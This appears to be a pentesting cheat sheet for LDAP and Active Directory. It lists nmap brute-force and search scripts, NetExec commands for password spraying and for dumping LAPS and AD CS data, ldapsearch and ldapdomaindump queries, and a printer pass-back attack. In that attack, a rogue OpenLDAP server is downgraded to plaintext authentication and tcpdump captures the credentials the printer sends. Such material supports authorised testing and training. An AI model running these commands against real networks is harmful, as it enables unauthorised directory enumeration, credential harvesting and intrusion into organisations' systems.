LDAP (Lightweight Directory Access Protocol) Pentesting

Last modified: Sun Feb 18 2024 00:00:00 GMT+0000 (Coordinated Universal Time)

Active Directory Windows

LDAP is a standard protocol designed to maintain and access "directory services" within a network. Default ports are 389 (LDAP), 636 (LDAPS), 3268 (LDAP connection to Global Catalog), 3269 (LDAP connection to Global Catalog over SSL).

Enumeration

# Nmap
nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 <target-ip>
nmap --script ldap-search -p 389 <target-ip>
nmap --script ldap-* -p 389 <target-ip>
nmap --script "ldap* and not brute" -p 389 <target-ip>

# NetExec
# -k: Use Kerberos authentication
netexec ldap <target-ip> -u usernames.txt -p '' -k
# --trusted-for-delegation: Enumerate computers and users with the flag `TRUSTED_FOR_DELEGATION`
# reference: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#property-flag-descriptions
netexec ldap <target-ip> -u username -p password --trusted-for-delegation

Search LDAP

Belows are defined in LDAP.

  • cn - Common Name
  • dc - Domain Component
  • ou - Organizational Unit
# -x: Simple authentication
# -b: base dn for search
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com"
ldapsearch -x -H ldaps://10.0.0.1:636 -b "dc=example,dc=com"

# As administrator
# -D: bind DN
# -w: bind password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -w password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -W

# Search sAMAccountName
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" "sAMAccountName"
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" "sAMAccountName" | grep sAMAccountName

# Get information
ldapsearch -x -H ldap://10.0.0.1 -b "cn=sample,cn=Users,dc=example,dc=com" -w 'password' "(objectclass=*)" -D "example\\name"

Dump Active Directory Information

If you have the credential, you can get the Active Directory information via LDAP.

# --no-html: Disable html output
# --no-grep: Disable greppable output
# -o: Output dir
ldapdomaindump -u 'DOMAIN\username' -p password <target-ip> --no-html --no-grep -o dumped

Connect

AD CS (Active Directory Certificate Services)

netexec ldap <target-ip> -d 'domain' -u 'username' -p 'password' -M adcs

LAPS (Local Administrator Password Solution)

netexec ldap <target-ip> -d 'domain' -u 'username' -p 'password' --kdcHost <target-ip> -M laps

Pass-Back Attack

Attack against the network devices such as printers.
For example, access http://printer.sub.example.com/settings.aspx

Open a listener for connecting back to your local machine.

nc -vp 1389

In your browser, test LDAP settings where you input username and password.

Host Rogue LDAP Server

If we cannot connect back in local machine by netcat, we need to create a rogue LDAP server.
Install the dependencies at first.

sudo apt update
sudo apt install -y slapd ldap-utils
sudo systemctl enable slapd

Configure your own rogue LDAP server by executing the following command.

sudo dpkg-reconfigure -p low slapd

# ---------------------------------------------------

# in configuration dialog

1. Omit OpenLDAP server configuration: No
2. DNS domain name: <target-domain>
3. Organization name: <target-domain>
4. Administrator password: <arbitrary-password>
5. Database backend to use: MDB
6. Do you want the database to be removed when slapd is purged?: No
7. Move old database?: Yes

We need to make your rogue LDAP server to be vulnerable by downgrading the supported authentication mechanism.
Create the config file named "config.ldif".

dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Now we can use the config file to patch the LDAP server.

# -Y: SASL mechanism
# -H: URI
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./config.ldif
sudo service slapd restart

We can verify that the rogue LDAP server’s configuration has been applied:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

For capturing the credentials, run the following command.

sudo tcpdump -SX -i <target-interface-like-eth0> tcp port 389

In browser, test the printer settings and capture the credentials via tcpdump.